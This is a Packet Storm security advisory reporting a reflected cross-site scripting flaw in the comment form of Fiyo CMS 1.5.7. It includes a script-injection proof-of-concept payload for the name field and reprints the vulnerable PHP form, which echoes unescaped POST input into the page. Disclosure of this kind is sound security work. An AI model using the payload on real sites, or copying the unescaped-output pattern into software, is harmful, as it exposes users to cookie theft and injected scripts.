exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Fiyo CMS 1.5.7 Cross Site Scripting

Fiyo CMS 1.5.7 Cross Site Scripting
Posted May 30, 2014
Authored by Mustafa ALTINKAYNAK

Fiyo CMS version 1.5.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 08fed02f9f2b63e9e1312b61486223ac28bb6b6a3ced74fc74a2776b5d4d06ab

Fiyo CMS 1.5.7 Cross Site Scripting

Change Mirror Download
# Exploit Title: Fiyo CMS 1.5.7 XSS Vulnerability
# Date: 05/29/2014
# Author: Mustafa ALTINKAYNAK
# Download URL :http://www.fiyo.org/
# Software Link: http://www.fiyo.org/download
# Vuln Category: CWE-79 (XSS)
# Tested on: Fiyo CMS 1.5.7
# Tested Local Platform : XAMP on Windows
# Patch/ Fix: Not published.
---------------------------

Technical Details
---------------------------
Reflected XSS : Review form can be bypassed. Users can be played cookies.

Example :
Nama : "><script>alert("test");</script>

---------------------------------------------------------------------------------

Form Comment (XSS Vuln)

# /apps/app_comment/form_comment.php

<?php
/**
* @name Comment
* @version 1.5.0
* @package Fiyo CMS
* @copyright Copyright (C) 2012 Fiyo CMS.
* @license GNU/GPL, see LICENSE.txt
* @description
**/

defined('_FINDEX_') or die('Access Denied');

?>
<script>

function reloadCaptcha() {
document.getElementById('captcha').src = document.getElementById('captcha').src+ '?' +new Date();
}
</script>

<h3 id="comments" ><?php echo comment_Leave_Comment; ?></h3>
<?php echo @$notice; ?>
<form method="post" action="#comments" class="form-comment">
<div><label><span><?php echo comment_Name; ?> *</span><div>
<input type='text' name='name' style='width:60%; max-width : 200px;' value ="<?php echo @$name; ?>" <?php if(!empty($name)) echo "readonly"; ?> class="input required" placeholder="Name" required></label></div>
</div>
<div><label><span><?php echo comment_Email; ?> *</span><div>
<input class="input required email" style='width:60%; max-width : 200px;' type='email' name='email' value ="<?php echo @$email; ?>" <?php if(!empty($email)) echo "readonly"; ?> placeholder="name@email.com" required></label></div>
</div>
<div><label><span><?php echo comment_Website; ?> </span><div>
<input type="url" class="input" style="width:60%; max-width : 200px;" name="web" value="<?php echo @$_POST['web']; ?>" placeholder="http://" /></label></div>
</div>
<div><label><span><?php echo comment_Comment; ?> *</span><div>
<textarea class="input required" name='com' style='width:100%; max-width : 500px;' rows="8" required><?php echo @$_POST['com']; ?></textarea></label></div>
</div>
<?php if(empty($privatekey) or empty($publickey )) : ?>
<div><span><?php echo comment_Security_Code; ?> * </span> <div><img src="<?php echo FUrl; ?>/plugins/plg_mathcaptcha/image.php" alt="Click to reload image" title="Click to reload image" id="captcha" onclick="javascript:reloadCaptcha()" class="captcha-image" /></div><input type="text" name="secure" placeholder="What's the result?" onclick="this.value=''" class="input required numeric" required /></div>
<?php else : ?>
<div>
<span>ReCaptcha *</span>
<div>
<script type="text/javascript">
var RecaptchaOptions = {
theme : 'clean'
};
</script>
<?php echo recaptcha_get_html($publickey);?>
</div>
</div>
<?php endif; ?>
<div style="overflow: visible;">
<input type='submit' name='send-comment' class='comment-button button btn' value="Send">
</div>
</form>

-----------

Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close